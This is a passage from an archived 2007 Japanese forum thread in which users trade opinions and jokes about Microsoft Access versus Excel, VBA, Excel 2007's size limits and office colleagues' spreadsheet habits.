Accessで困ったときには、
Excelで読めるファイルにエクスポートして、
Excelで加工するのは、基本技。

133 :NAME IS NULL:2007/02/25(日) 19:39:13 ID:???
Excelへの吐き出しに頼るのは、
まともなシステムが構築出来ない無能力プログラマの常套手段

134 :NAME IS NULL:2007/02/25(日) 20:59:27 ID:???
>>133
無能力とか言う前にプログラムの話じゃないだろう?
VBAばりばり使える人がする質問じゃない。
もしVBAばりばり使える人だって言うのなら、
入力するたびにデフォルトのValueを変えればいいだけだろ?



135 :NAME IS NULL:2007/02/25(日) 21:12:30 ID:???
>>134
VBAさえも使えないというなら、それも無能力

136 :NAME IS NULL:2007/02/25(日) 21:35:04 ID:???
君は分かってないな。
>>127はあれだぞ。

137 :NAME IS NULL:2007/02/25(日) 21:48:30 ID:???
>>135
しかたないだろう?
ほとんどの人は大量のデータが扱えるExcelくらいの認識なんだから?
もともと別の会社の製品でExcelとは氏も素性も違って
ほとんど似てないなんて知らないのだから?
VBAがわからないと結局使い物にならないなんて思ってもいないよ。

マイクロソフトもいっそのこと桐でも買ってくれば良かったのに?
あれのほうが少しはExcelに似ている。


138 :NAME IS NULL:2007/02/26(月) 11:56:07 ID:9FHFgL0a
お薦めの入門サイト教えてください。
ぐぐっても、本の販売サイトばかりひっかかります。
たまに発見できてもバージョンがあいません。
自分のは2000なんですが・・・

139 :NAME IS NULL:2007/02/26(月) 12:38:32 ID:9FHFgL0a
アクセスってマクロの自動記録って無いんですね。
知らなかった。ショック・・・・

140 :NAME IS NULL:2007/02/26(月) 16:41:24 ID:???
>>139
だからExcelとはまるで違うものなんだって・・・
桐にはあるんだよね。マクロの自動記録とは呼ばないけれど・・・
http://www.naboki.net/access/heaven/index.html
いわゆる入門サイトとは違うけど、入門する前に目を通したほうがいいことがいっぱい書いてあります。

141 :NAME IS NULL:2007/02/26(月) 20:24:47 ID:???
>>137 もはや、Access不要だなw

Office Excel 2007 では、最大 100 万行、16,000 列のスプレッドシートが
サポートされているため、膨大な量のデータを処理できます。
大量のデータを分析する必要がある場合でも、複数のスプレッドシートや
他のアプリケーションを使用する必要はありません。

142 :NAME IS NULL:2007/02/26(月) 21:35:30 ID:???
>>141
だからExcelとAccessはまったくの別物だって・・・・・
Excelがいくら大量データを使えるようになったところで、
Accessの代わりにはならない。


143 :NAME IS NULL:2007/02/26(月) 23:27:47 ID:???
普通はそうだが>>127>>139みたいな人は同じものだと思っていると思います。

144 :NAME IS NULL:2007/02/26(月) 23:50:23 ID:???
>>142

笑いどころはここ。
>他のアプリケーションを使用する必要はありません。

145 :NAME IS NULL:2007/02/27(火) 00:43:18 ID:wWLkB84B
うちの会社エクセルシートに計算機で手計算して数値入力してる上司がいるんだがw

いいじゃないの 結果がちゃんと出れば・・・・

146 :NAME IS NULL:2007/02/27(火) 00:52:32 ID:PNBDDMi/
ワロッタw
EXCELがメモ帳代わりかよ

147 :NAME IS NULL:2007/02/27(火) 01:52:14 ID:???
1万何千列100万行のデータを抱え込んだExcelのファイルってのは、
どれぐらいのサイズになるんだ
つか、クリックしてから開けるまでどれぐらい時間がかかるんだ
開いている間に冬が終わって春とか初夏とかが来て梅雨が来て落雷して
停電しちゃっても大丈夫なのか

148 :NAME IS NULL:2007/02/27(火) 02:30:29 ID:???
早いCPUにメモリを沢山つんで、無停電装置もつければ
おーけーじゃね?

149 :NAME IS NULL:2007/02/27(火) 08:25:50 ID:???
>>145
うちはもうちょっとマシ。
=1+2+3+4+........................
とちゃんと=の使い方はマスターした(w
セルの意味は永久に理解しそうにない。


150 :NAME IS NULL:2007/02/27(火) 10:21:38 ID:0L3j2AYF
(・∀・):あ○○君ちょっとここ教えてほしいんだが・・・・
(´Д`;):ハイハイ・・・ああ ここはですね・・・
(・∀・):おおーこうやるのか・・あーわかったわかった後はこっちでやる
(´Д`;):はいではお願いします

5分後

(・∀・):あ○○君ちょっとここ教えてほしいんだが・・・・
(´Д`;):ハイハイ・・・ああ ここはですね・・・(わからなかったんだな・・・)

151 :NAME IS NULL:2007/02/28(水) 01:19:18 ID:???
Excel,Accessマンセーする奴に限って,
OracleとかSQLServerでシステム構築すると,
安定性大丈夫なんですか!RASISは!とか言って騒ぐんだよな.
おまいらの使ってるソレよりは16倍くらいはマシだっつーの.

152 :NAME IS NULL:2007/02/28(水) 01:27:21 ID:???
>>151
何か悪いもんでも喰ったか?

つ:ゲロ袋

153 :NAME IS NULL:2007/02/28(水) 04:30:30 ID:???
>>151
16倍は酷いだろ! 256倍くらいにしとけよw

154 :NAME IS NULL:2007/02/28(水) 11:22:24 ID:???
>>151
そいつに「2GB」とか「65,536 行、256 列」と耳打ちしてみる。


155 :NAME IS NULL:2007/02/28(水) 12:14:29 ID:???
>>151
Excel2007マンセー、と言い返される。

156 :NAME IS NULL:2007/02/28(水) 13:54:02 ID:/liZTVWN
ACCESSは70過ぎのウチの老母でも楽々使えるが、Oracleは東大卒の巨大パソコンメーカー社員でも難しいと嘆くソフト。
ママチャリとF1を比べるようなものだろ。

157 :NAME IS NULL:2007/02/28(水) 14:05:19 ID:???
フロントエンドとDBMSを比べてどうすんのよ


41 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)